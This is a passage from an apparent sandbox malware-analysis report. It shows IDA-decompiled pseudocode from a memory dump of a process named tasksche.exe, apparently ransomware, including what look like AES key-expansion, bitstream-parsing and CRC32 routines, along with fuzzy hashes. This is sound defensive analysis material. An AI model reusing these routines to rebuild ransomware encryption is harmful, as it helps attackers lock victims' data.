                                                                                              					_t106 =  *((intOrPtr*)( &_v521 - ( *(_t183 + (((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) >> 0x00000008 & 0x000000ff ^ ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) & 0x000000ff ^ 0x00000005) - 0x104) & 0x000000ff)));
                                                                                              				}
                                                                                              				 *(_v8 + 0x438600) = _t106;
                                                                                              				if(_t106 == 0) {
                                                                                              					_t161 = 0;
                                                                                              				} else {
                                                                                              					_t161 =  *(_t183 + ( *(_t183 + (_t106 & 0x000000ff) - 0x104) & 0x000000ff) - 0x29c) & 0x000000ff;
                                                                                              				}
                                                                                              				_t182 = _t106 & 0x000000ff;
                                                                                              				_t129 = _t182 << 2;
                                                                                              				 *(_t102 + 0x4365e2) = _t161;
                                                                                              				 *(_t102 + 0x4369e1) = _t161;
                                                                                              				 *(_t102 + 0x436de0) = _t161;
                                                                                              				 *(_t102 + 0x4371e3) = _t161;
                                                                                              				 *(_t129 + 0x4355e2) = _t161;
                                                                                              				 *(_t129 + 0x4359e1) = _t161;
                                                                                              				 *(_t129 + 0x435de0) = _t161;
                                                                                              				 *(_t129 + 0x4361e3) = _t161;
                                                                                              				if(_t106 == 0) {
                                                                                              					_t162 = 0;
                                                                                              				} else {
                                                                                              					_t162 =  *(_t183 + ( *(_t183 + _t182 - 0x104) & 0x000000ff) - 0x23d) & 0x000000ff;
                                                                                              				}
                                                                                              				 *(_t102 + 0x4365e0) = _t162;
                                                                                              				 *(_t102 + 0x4369e3) = _t162;
                                                                                              				 *(_t102 + 0x436de2) = _t162;
                                                                                              				 *(_t102 + 0x4371e1) = _t162;
                                                                                              				 *(_t129 + 0x4355e0) = _t162;
                                                                                              				 *(_t129 + 0x4359e3) = _t162;
                                                                                              				 *(_t129 + 0x435de2) = _t162;
                                                                                              				 *(_t129 + 0x4361e1) = _t162;
                                                                                              				if(_t106 == 0) {
                                                                                              					_t163 = 0;
                                                                                              				} else {
                                                                                              					_t163 =  *(_t183 + ( *(_t183 + _t182 - 0x104) & 0x000000ff) - 0x216) & 0x000000ff;
                                                                                              				}
                                                                                              				 *(_t102 + 0x4365e1) = _t163;
                                                                                              				 *(_t102 + 0x4369e0) = _t163;
                                                                                              				 *(_t102 + 0x436de3) = _t163;
                                                                                              				 *(_t102 + 0x4371e2) = _t163;
                                                                                              				 *(_t129 + 0x4355e1) = _t163;
                                                                                              				 *(_t129 + 0x4359e0) = _t163;
                                                                                              				 *(_t129 + 0x435de3) = _t163;
                                                                                              				 *(_t129 + 0x4361e2) = _t163;
                                                                                              				if(_t106 == 0) {
                                                                                              					_t164 = 0;
                                                                                              				} else {
                                                                                              					_t164 =  *(_t183 + ( *(_t183 + _t182 - 0x104) & 0x000000ff) - 0x225) & 0x000000ff;
                                                                                              				}
                                                                                              				_v8 = _v8 + 1;
                                                                                              				 *(_t102 + 0x4365e3) = _t164;
                                                                                              				 *(_t102 + 0x4369e2) = _t164;
                                                                                              				 *(_t102 + 0x436de1) = _t164;
                                                                                              				 *(_t102 + 0x4371e0) = _t164;
                                                                                              				 *(_t129 + 0x4355e3) = _t164;
                                                                                              				 *(_t129 + 0x4359e2) = _t164;
                                                                                              				 *(_t129 + 0x435de1) = _t164;
                                                                                              				 *(_t129 + 0x4361e0) = _t164;
                                                                                              				if(_v8 < 0x100) {
                                                                                              					goto L5;
                                                                                              				}
                                                                                              				return _t102;
                                                                                              				L5:
                                                                                              				_t105 = _v8;
                                                                                              				goto L6;
                                                                                              			}
























                                                                                              0x0040c763
                                                                                              0x0040c765
                                                                                              0x0040c76c
                                                                                              0x0040c774
                                                                                              0x0040c77b
                                                                                              0x0040c782
                                                                                              0x0040c789
                                                                                              0x0040c78c
                                                                                              0x0040c795
                                                                                              0x0040c797
                                                                                              0x0040c79c
                                                                                              0x0040c79f
                                                                                              0x0040c7a9
                                                                                              0x0040c7ab
                                                                                              0x0040c7b5
                                                                                              0x0040c7b7
                                                                                              0x0040c7b8
                                                                                              0x0040c7bd
                                                                                              0x0040c7bf
                                                                                              0x00000000
                                                                                              0x0040c7c7
                                                                                              0x0040c7c9
                                                                                              0x0040c7e3
                                                                                              0x0040c7cb
                                                                                              0x0040c7de
                                                                                              0x0040c7de
                                                                                              0x0040c7fd
                                                                                              0x0040c800
                                                                                              0x0040c807
                                                                                              0x0040c807
                                                                                              0x0040c80d
                                                                                              0x0040c813
                                                                                              0x0040c816
                                                                                              0x0040c818
                                                                                              0x0040c81e
                                                                                              0x0040c824
                                                                                              0x0040c82a
                                                                                              0x0040c830
                                                                                              0x0040c836
                                                                                              0x0040c83c
                                                                                              0x0040c853
                                                                                              0x0040c83e
                                                                                              0x0040c849
                                                                                              0x0040c849
                                                                                              0x0040c855
                                                                                              0x0040c85b
                                                                                              0x0040c861
                                                                                              0x0040c867
                                                                                              0x0040c86f
                                                                                              0x0040c886
                                                                                              0x0040c871
                                                                                              0x0040c87c
                                                                                              0x0040c87c
                                                                                              0x0040c888
                                                                                              0x0040c88e
                                                                                              0x0040c894
                                                                                              0x0040c89a
                                                                                              0x0040c8a0
                                                                                              0x0040c8bb
                                                                                              0x0040c8ef
                                                                                              0x0040c8bd
                                                                                              0x0040c8eb
                                                                                              0x0040c8eb
                                                                                              0x0040c8f4
                                                                                              0x0040c8fc
                                                                                              0x0040c913
                                                                                              0x0040c8fe
                                                                                              0x0040c909
                                                                                              0x0040c909
                                                                                              0x0040c915
                                                                                              0x0040c91a
                                                                                              0x0040c91d
                                                                                              0x0040c923
                                                                                              0x0040c929
                                                                                              0x0040c92f
                                                                                              0x0040c935
                                                                                              0x0040c93b
                                                                                              0x0040c941
                                                                                              0x0040c947
                                                                                              0x0040c94f
                                                                                              0x0040c963
                                                                                              0x0040c951
                                                                                              0x0040c959
                                                                                              0x0040c959
                                                                                              0x0040c965
                                                                                              0x0040c96b
                                                                                              0x0040c971
                                                                                              0x0040c977
                                                                                              0x0040c97d
                                                                                              0x0040c983
                                                                                              0x0040c989
                                                                                              0x0040c98f
                                                                                              0x0040c997
                                                                                              0x0040c9ab
                                                                                              0x0040c999
                                                                                              0x0040c9a1
                                                                                              0x0040c9a1
                                                                                              0x0040c9ad
                                                                                              0x0040c9b3
                                                                                              0x0040c9b9
                                                                                              0x0040c9bf
                                                                                              0x0040c9c5
                                                                                              0x0040c9cb
                                                                                              0x0040c9d1
                                                                                              0x0040c9d7
                                                                                              0x0040c9df
                                                                                              0x0040c9f3
                                                                                              0x0040c9e1
                                                                                              0x0040c9e9
                                                                                              0x0040c9e9
                                                                                              0x0040c9f5
                                                                                              0x0040c9ff
                                                                                              0x0040ca05
                                                                                              0x0040ca0b
                                                                                              0x0040ca11
                                                                                              0x0040ca17
                                                                                              0x0040ca1d
                                                                                              0x0040ca23
                                                                                              0x0040ca29
                                                                                              0x0040ca2f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ca38
                                                                                              0x0040c7c4
                                                                                              0x0040c7c4
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e054519032d673b283cd141de9047936413c4ec94c95275afdf7b1c1e6e7c11b
                                                                                              • Instruction ID: cc05d4957c3f93bbff5645bcbd2bf23a73745bdaee5f26767fd414b38deba9ac
                                                                                              • Opcode Fuzzy Hash: e054519032d673b283cd141de9047936413c4ec94c95275afdf7b1c1e6e7c11b
                                                                                              • Instruction Fuzzy Hash: 7281E35220E2E18EE71AC73C14E96F63FA11F72100B2EA2EEC4CD4F6D7D665051AD729
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 97%
                                                                                              			E0040C4FF(intOrPtr __ecx, void* __eflags, signed int _a4) {
                                                                                              				intOrPtr _v8;
                                                                                              				signed int* _v12;
                                                                                              				signed char* _v16;
                                                                                              				signed char* _v20;
                                                                                              				signed char* _v24;
                                                                                              				signed char* _v28;
                                                                                              				char _v40;
                                                                                              				signed int _v41;
                                                                                              				signed int _v42;
                                                                                              				signed int _v43;
                                                                                              				signed int _v44;
                                                                                              				signed char _v45;
                                                                                              				signed char _v46;
                                                                                              				signed char _v47;
                                                                                              				signed char _v48;
                                                                                              				char _v56;
                                                                                              				signed int _v57;
                                                                                              				signed int _v58;
                                                                                              				signed int _v59;
                                                                                              				signed int _v60;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed int _t102;
                                                                                              				signed int _t104;
                                                                                              				signed char _t108;
                                                                                              				signed int _t119;
                                                                                              				signed int* _t135;
                                                                                              				signed int* _t136;
                                                                                              				signed int _t137;
                                                                                              				char* _t138;
                                                                                              				void* _t139;
                                                                                              				void* _t140;
                                                                                              				intOrPtr _t141;
                                                                                              				void* _t142;
                                                                                              				void* _t143;
                                                                                              				void* _t145;
                                                                                              				void* _t147;
                                                                                              				void* _t148;
                                                                                              				void* _t149;
                                                                                              				void* _t151;
                                                                                              				void* _t157;
                                                                                              
                                                                                              				_t141 = __ecx;
                                                                                              				_v8 = __ecx;
                                                                                              				_t119 =  *((intOrPtr*)(__ecx + 4)) - 6;
                                                                                              				E0041C290(_t119, __ecx, _t147,  &_v60, _a4, 0x20);
                                                                                              				_t102 = 0;
                                                                                              				_t140 = 0;
                                                                                              				_a4 = 0;
                                                                                              				if(_t119 <= 0) {
                                                                                              					L9:
                                                                                              					if(_t140 <=  *((intOrPtr*)(_t141 + 4))) {
                                                                                              						_t104 = _t119 << 2;
                                                                                              						_v16 = _t157 + _t104 - 0x3b;
                                                                                              						_v20 = _t157 + _t104 - 0x3a;
                                                                                              						_v24 = _t157 + _t104 - 0x39;
                                                                                              						_v28 = _t157 + _t104 - 0x3c;
                                                                                              						_v12 = 0x4385e0;
                                                                                              						do {
                                                                                              							_t108 = _v60 ^  *(( *_v16 & 0x000000ff) + 0x438700);
                                                                                              							_v60 = _t108;
                                                                                              							_v59 = _v59 ^  *(( *_v20 & 0x000000ff) + 0x438700);
                                                                                              							_v58 = _v58 ^  *(( *_v24 & 0x000000ff) + 0x438700);
                                                                                              							_v57 = _v57 ^  *(( *_v28 & 0x000000ff) + 0x438700);
                                                                                              							_t102 = _t108 ^  *_v12;
                                                                                              							_v12 =  &(_v12[0]);
                                                                                              							_v60 = _t102;
                                                                                              							if(_t119 == 8) {
                                                                                              								_t135 =  &_v56;
                                                                                              								_t142 = 3;
                                                                                              								do {
                                                                                              									_t148 = 4;
                                                                                              									do {
                                                                                              										 *_t135 =  *_t135 ^  *(_t135 - 4);
                                                                                              										_t135 =  &(_t135[0]);
                                                                                              										_t148 = _t148 - 1;
                                                                                              									} while (_t148 != 0);
                                                                                              									_t142 = _t142 - 1;
                                                                                              								} while (_t142 != 0);
                                                                                              								_v44 = _v44 ^  *((_v48 & 0x000000ff) + 0x438700);
                                                                                              								_v43 = _v43 ^  *((_v47 & 0x000000ff) + 0x438700);
                                                                                              								_v42 = _v42 ^  *((_v46 & 0x000000ff) + 0x438700);
                                                                                              								_v41 = _v41 ^  *((_v45 & 0x000000ff) + 0x438700);
                                                                                              								_t136 =  &_v40;
                                                                                              								_t143 = 3;
                                                                                              								do {
                                                                                              									_t149 = 4;
                                                                                              									do {
                                                                                              										_t102 =  *((intOrPtr*)(_t136 - 4));
                                                                                              										 *_t136 =  *_t136 ^ _t102;
                                                                                              										_t136 =  &(_t136[0]);
                                                                                              										_t149 = _t149 - 1;
                                                                                              									} while (_t149 != 0);
                                                                                              									_t143 = _t143 - 1;
                                                                                              								} while (_t143 != 0);
                                                                                              								goto L26;
                                                                                              							} else {
                                                                                              								if(_t119 > 1) {
                                                                                              									_t138 =  &_v56;
                                                                                              									_t145 = _t119 - 1;
                                                                                              									do {
                                                                                              										_t151 = 0;
                                                                                              										do {
                                                                                              											_t102 =  *((intOrPtr*)(_t138 + _t151 - 4));
                                                                                              											 *(_t138 + _t151) =  *(_t138 + _t151) ^ _t102;
                                                                                              											_t151 = _t151 + 1;
                                                                                              										} while (_t151 < 4);
                                                                                              										_t138 = _t138 + 4;
                                                                                              										_t145 = _t145 - 1;
                                                                                              									} while (_t145 != 0);
                                                                                              									L26:
                                                                                              									_t141 = _v8;
                                                                                              								}
                                                                                              							}
                                                                                              							_t137 = 0;
                                                                                              							if(_t119 <= 0) {
                                                                                              								goto L36;
                                                                                              							} else {
                                                                                              								while(_t140 <=  *((intOrPtr*)(_t141 + 4))) {
                                                                                              									if(_t137 < _t119) {
                                                                                              										_t102 = _t157 + _t137 * 4 - 0x38;
                                                                                              										while(_a4 < 4) {
                                                                                              											_t137 = _t137 + 1;
                                                                                              											_t102 = _t102 + 4;
                                                                                              											_a4 = _a4 + 1;
                                                                                              											asm("movsd");
                                                                                              											_t141 = _v8;
                                                                                              											if(_t137 < _t119) {
                                                                                              												continue;
                                                                                              											}
                                                                                              											goto L33;
                                                                                              										}
                                                                                              									}
                                                                                              									L33:
                                                                                              									if(_a4 == 4) {
                                                                                              										_t140 = _t140 + 1;
                                                                                              										_a4 = _a4 & 0x00000000;
                                                                                              									}
                                                                                              									if(_t137 < _t119) {
                                                                                              										continue;
                                                                                              									} else {
                                                                                              										goto L36;
                                                                                              									}
                                                                                              									goto L37;
                                                                                              								}
                                                                                              							}
                                                                                              							goto L37;
                                                                                              							L36:
                                                                                              						} while (_t140 <=  *((intOrPtr*)(_t141 + 4)));
                                                                                              					}
                                                                                              				} else {
                                                                                              					while(_t140 <=  *((intOrPtr*)(_t141 + 4))) {
                                                                                              						if(_t102 < _t119) {
                                                                                              							_t139 = _t157 + _t102 * 4 - 0x38;
                                                                                              							while(_a4 < 4) {
                                                                                              								_t102 = _t102 + 1;
                                                                                              								_t139 = _t139 + 4;
                                                                                              								_a4 = _a4 + 1;
                                                                                              								asm("movsd");
                                                                                              								_t141 = _v8;
                                                                                              								if(_t102 < _t119) {
                                                                                              									continue;
                                                                                              								}
                                                                                              								goto L6;
                                                                                              							}
                                                                                              						}
                                                                                              						L6:
                                                                                              						if(_a4 == 4) {
                                                                                              							_t140 = _t140 + 1;
                                                                                              							_a4 = _a4 & 0x00000000;
                                                                                              						}
                                                                                              						if(_t102 < _t119) {
                                                                                              							continue;
                                                                                              						} else {
                                                                                              							goto L9;
                                                                                              						}
                                                                                              						goto L37;
                                                                                              					}
                                                                                              				}
                                                                                              				L37:
                                                                                              				return _t102;
                                                                                              			}













































                                                                                              0x0040c50d
                                                                                              0x0040c516
                                                                                              0x0040c519
                                                                                              0x0040c51c
                                                                                              0x0040c521
                                                                                              0x0040c526
                                                                                              0x0040c52a
                                                                                              0x0040c52d
                                                                                              0x0040c56f
                                                                                              0x0040c572
                                                                                              0x0040c57a
                                                                                              0x0040c581
                                                                                              0x0040c588
                                                                                              0x0040c593
                                                                                              0x0040c596
                                                                                              0x0040c599
                                                                                              0x0040c5a0
                                                                                              0x0040c5a9
                                                                                              0x0040c5b2
                                                                                              0x0040c5be
                                                                                              0x0040c5cd
                                                                                              0x0040c5dc
                                                                                              0x0040c5e2
                                                                                              0x0040c5e4
                                                                                              0x0040c5e7
                                                                                              0x0040c5ed
                                                                                              0x0040c613
                                                                                              0x0040c616
                                                                                              0x0040c617
                                                                                              0x0040c619
                                                                                              0x0040c61a
                                                                                              0x0040c61d
                                                                                              0x0040c61f
                                                                                              0x0040c620
                                                                                              0x0040c620
                                                                                              0x0040c623
                                                                                              0x0040c623
                                                                                              0x0040c630
                                                                                              0x0040c63d
                                                                                              0x0040c64a
                                                                                              0x0040c657
                                                                                              0x0040c65c
                                                                                              0x0040c65f
                                                                                              0x0040c660
                                                                                              0x0040c662
                                                                                              0x0040c663
                                                                                              0x0040c663
                                                                                              0x0040c666
                                                                                              0x0040c668
                                                                                              0x0040c669
                                                                                              0x0040c669
                                                                                              0x0040c66c
                                                                                              0x0040c66c
                                                                                              0x00000000
                                                                                              0x0040c5ef
                                                                                              0x0040c5f2
                                                                                              0x0040c5f4
                                                                                              0x0040c5f7
                                                                                              0x0040c5fa
                                                                                              0x0040c5fa
                                                                                              0x0040c5fc
                                                                                              0x0040c5fc
                                                                                              0x0040c600
                                                                                              0x0040c603
                                                                                              0x0040c604
                                                                                              0x0040c609
                                                                                              0x0040c60c
                                                                                              0x0040c60c
                                                                                              0x0040c66f
                                                                                              0x0040c66f
                                                                                              0x0040c66f
                                                                                              0x0040c5f2
                                                                                              0x0040c672
                                                                                              0x0040c676
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c678
                                                                                              0x0040c67f
                                                                                              0x0040c681
                                                                                              0x0040c685
                                                                                              0x0040c696
                                                                                              0x0040c697
                                                                                              0x0040c69a
                                                                                              0x0040c69f
                                                                                              0x0040c6a0
                                                                                              0x0040c6a3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c6a3
                                                                                              0x0040c685
                                                                                              0x0040c6a5
                                                                                              0x0040c6a9
                                                                                              0x0040c6ab
                                                                                              0x0040c6ac
                                                                                              0x0040c6ac
                                                                                              0x0040c6b2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c6b2
                                                                                              0x0040c678
                                                                                              0x00000000
                                                                                              0x0040c6b4
                                                                                              0x0040c6b4
                                                                                              0x0040c5a0
                                                                                              0x00000000
                                                                                              0x0040c52f
                                                                                              0x0040c53a
                                                                                              0x0040c53c
                                                                                              0x0040c540
                                                                                              0x0040c551
                                                                                              0x0040c552
                                                                                              0x0040c555
                                                                                              0x0040c55a
                                                                                              0x0040c55b
                                                                                              0x0040c55e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c55e
                                                                                              0x0040c540
                                                                                              0x0040c560
                                                                                              0x0040c564
                                                                                              0x0040c566
                                                                                              0x0040c567
                                                                                              0x0040c567
                                                                                              0x0040c56d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c56d
                                                                                              0x0040c52f
                                                                                              0x0040c6c1
                                                                                              0x0040c6c1

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aae54acdac3927cc066ee4afd89015ce1ad81bcf754d871dab6d471837bf2d3e
                                                                                              • Instruction ID: ff0af43037c4d522a8ee791cbe8e93d8d44487ff0532052a3f1666816209b0e9
                                                                                              • Opcode Fuzzy Hash: aae54acdac3927cc066ee4afd89015ce1ad81bcf754d871dab6d471837bf2d3e
                                                                                              • Instruction Fuzzy Hash: CF51F874804298AACF11CFA4C4D05FDBFB0EF5A328F6955BFD8857B282C2356646CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 97%
                                                                                              			E0041450F(void* __ebx, intOrPtr __ecx, signed int* _a4, char _a7, signed int* _a8, signed char _a11) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				signed int _t40;
                                                                                              				signed int _t41;
                                                                                              				signed int _t47;
                                                                                              				intOrPtr _t48;
                                                                                              				unsigned int _t49;
                                                                                              				signed int _t53;
                                                                                              				void* _t57;
                                                                                              				void* _t58;
                                                                                              				signed char _t60;
                                                                                              				void* _t64;
                                                                                              				unsigned char _t75;
                                                                                              				intOrPtr _t87;
                                                                                              				signed int* _t91;
                                                                                              				signed int* _t92;
                                                                                              				signed int _t93;
                                                                                              				intOrPtr _t94;
                                                                                              
                                                                                              				_t58 = __ebx;
                                                                                              				_t92 = _a4;
                                                                                              				_t91 = _a8;
                                                                                              				_t91[3] = _t91[3] & 0x00000000;
                                                                                              				_v16 = __ecx;
                                                                                              				if(_t92[2] != 0 ||  *_t92 <=  *((intOrPtr*)(__ecx + 0x78)) - 7) {
                                                                                              					L3:
                                                                                              					_push(_t58);
                                                                                              					E004097BA(_t92,  ~(_t92[1]) & 0x00000007);
                                                                                              					_t60 = E004097D1(_t92) >> 8;
                                                                                              					_a11 = _t60;
                                                                                              					E004097BA(_t92, 8);
                                                                                              					_t40 = _t60 & 0x000000ff;
                                                                                              					_t64 = (_t40 >> 0x00000003 & 0x00000003) + 1;
                                                                                              					if(_t64 == 4) {
                                                                                              						L9:
                                                                                              						_t41 = 0;
                                                                                              						L13:
                                                                                              						return _t41;
                                                                                              					}
                                                                                              					_t10 = _t64 + 2; // 0x3
                                                                                              					_t91[3] = _t10;
                                                                                              					_t91[1] = (_t40 & 0x00000007) + 1;
                                                                                              					_a7 = E004097D1(_t92) >> 8;
                                                                                              					E004097BA(_t92, 8);
                                                                                              					_t47 = 0;
                                                                                              					_v12 = 0;
                                                                                              					if(_t64 <= 0) {
                                                                                              						L8:
                                                                                              						_t75 = _a11;
                                                                                              						 *_t91 = _t47;
                                                                                              						if((_t47 >> 0x00000010 ^ _t47 >> 0x00000008 ^ _t47 ^ _t75 ^ 0x0000005a) == _a7) {
                                                                                              							_t93 =  *_t92;
                                                                                              							_t87 = _t93 + _t47 - 1;
                                                                                              							_t48 = _v16;
                                                                                              							_t91[2] = _t93;
                                                                                              							_t94 =  *((intOrPtr*)(_t48 + 0x7c));
                                                                                              							if(_t94 < _t87) {
                                                                                              								_t87 = _t94;
                                                                                              							}
                                                                                              							 *((intOrPtr*)(_t48 + 0x7c)) = _t87;
                                                                                              							_t41 = 1;
                                                                                              							_t91[4] = _t75 >> 0x00000006 & 0x00000001;
                                                                                              							_t91[4] = _t75 >> 7;
                                                                                              							goto L13;
                                                                                              						}
                                                                                              						goto L9;
                                                                                              					}
                                                                                              					_v8 = 0;
                                                                                              					do {
                                                                                              						_t49 = E004097D1(_t92);
                                                                                              						_v8 = _v8 + 8;
                                                                                              						_v12 = _v12 + (_t49 >> 8 << _v8);
                                                                                              						_t53 = _t92[1] + 8;
                                                                                              						 *_t92 =  *_t92 + (_t53 >> 3);
                                                                                              						_t64 = _t64 - 1;
                                                                                              						_t92[1] = _t53 & 0x00000007;
                                                                                              					} while (_t64 != 0);
                                                                                              					_t47 = _v12;
                                                                                              					goto L8;
                                                                                              				}
                                                                                              				_t57 = E004123EB(__ebx, __ecx);
                                                                                              				if(_t57 != 0) {
                                                                                              					goto L3;
                                                                                              				}
                                                                                              				return _t57;
                                                                                              			}






















                                                                                              0x0041450f
                                                                                              0x00414516
                                                                                              0x0041451a
                                                                                              0x0041451d
                                                                                              0x00414525
                                                                                              0x00414528
                                                                                              0x00414541
                                                                                              0x00414546
                                                                                              0x0041454d
                                                                                              0x0041455b
                                                                                              0x00414562
                                                                                              0x00414565
                                                                                              0x0041456a
                                                                                              0x00414575
                                                                                              0x00414579
                                                                                              0x004145f6
                                                                                              0x004145f6
                                                                                              0x00414624
                                                                                              0x00000000
                                                                                              0x00414624
                                                                                              0x0041457b
                                                                                              0x00414581
                                                                                              0x00414587
                                                                                              0x00414596
                                                                                              0x00414599
                                                                                              0x0041459e
                                                                                              0x004145a0
                                                                                              0x004145a5
                                                                                              0x004145d9
                                                                                              0x004145e5
                                                                                              0x004145ef
                                                                                              0x004145f4
                                                                                              0x004145fa
                                                                                              0x004145fc
                                                                                              0x00414600
                                                                                              0x00414603
                                                                                              0x00414606
                                                                                              0x0041460b
                                                                                              0x0041460d
                                                                                              0x0041460d
                                                                                              0x0041460f
                                                                                              0x00414617
                                                                                              0x0041461e
                                                                                              0x00414621
                                                                                              0x00000000
                                                                                              0x00414621
                                                                                              0x00000000
                                                                                              0x004145f4
                                                                                              0x004145a7
                                                                                              0x004145aa
                                                                                              0x004145ac
                                                                                              0x004145b4
                                                                                              0x004145bd
                                                                                              0x004145c3
                                                                                              0x004145cb
                                                                                              0x004145d0
                                                                                              0x004145d1
                                                                                              0x004145d1
                                                                                              0x004145d6
                                                                                              0x00000000
                                                                                              0x004145d6
                                                                                              0x00414534
                                                                                              0x0041453b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414628

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 51b2d21a1de5244f25583c5063fbcf28c6649e746e5830653507aa8b0461497a
                                                                                              • Instruction ID: 1b781f1f23d015917a337ea3c6206954a5313e6084e2437016288461132a8366
                                                                                              • Opcode Fuzzy Hash: 51b2d21a1de5244f25583c5063fbcf28c6649e746e5830653507aa8b0461497a
                                                                                              • Instruction Fuzzy Hash: EF312372A10605ABCB04DF38C4912DEBBE2EF81308F14812FD865DB782D37DA945CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00405610(unsigned int _a4, signed char _a8, unsigned int _a12) {
                                                                                              				signed char _t30;
                                                                                              				signed char _t32;
                                                                                              				signed char _t52;
                                                                                              				signed char _t57;
                                                                                              				unsigned int _t72;
                                                                                              
                                                                                              				_t52 = _a8;
                                                                                              				_t30 = _a4;
                                                                                              				_t72 = _a12;
                                                                                              				while(_t72 > 0 && (_t52 & 0x00000007) != 0) {
                                                                                              					_t30 = _t30 >> 0x00000008 ^  *(0x4315a0 + ( *_t52 & 0x000000ff ^ _t30 & 0x000000ff) * 4);
                                                                                              					_t72 = _t72 - 1;
                                                                                              					_t52 = _t52 + 1;
                                                                                              				}
                                                                                              				if(_t72 >= 8) {
                                                                                              					_a4 = _t72 >> 3;
                                                                                              					do {
                                                                                              						_t57 =  *(_t52 + 4);
                                                                                              						_t32 = _t30 ^  *_t52;
                                                                                              						_t72 = _t72 - 8;
                                                                                              						_t52 = _t52 + 8;
                                                                                              						_t26 =  &_a4;
                                                                                              						 *_t26 = _a4 - 1;
                                                                                              						_t30 =  *(0x4319a0 + (_t57 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4315a0 + (_t57 >> 0x18) * 4) ^  *(0x431da0 + (_t57 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4325a0 + (_t32 >> 0x18) * 4) ^  *(0x4329a0 + (_t32 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x432da0 + (_t32 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4321a0 + (_t57 & 0x000000ff) * 4) ^  *(0x4331a0 + (_t32 & 0x000000ff) * 4);
                                                                                              					} while ( *_t26 != 0);
                                                                                              					L9:
                                                                                              					while(_t72 > 0) {
                                                                                              						_t30 = _t30 >> 0x00000008 ^  *(0x4315a0 + ( *_t52 & 0x000000ff ^ _t30 & 0x000000ff) * 4);
                                                                                              						_t72 = _t72 - 1;
                                                                                              						_t52 = _t52 + 1;
                                                                                              					}
                                                                                              					return _t30;
                                                                                              				}
                                                                                              				goto L9;
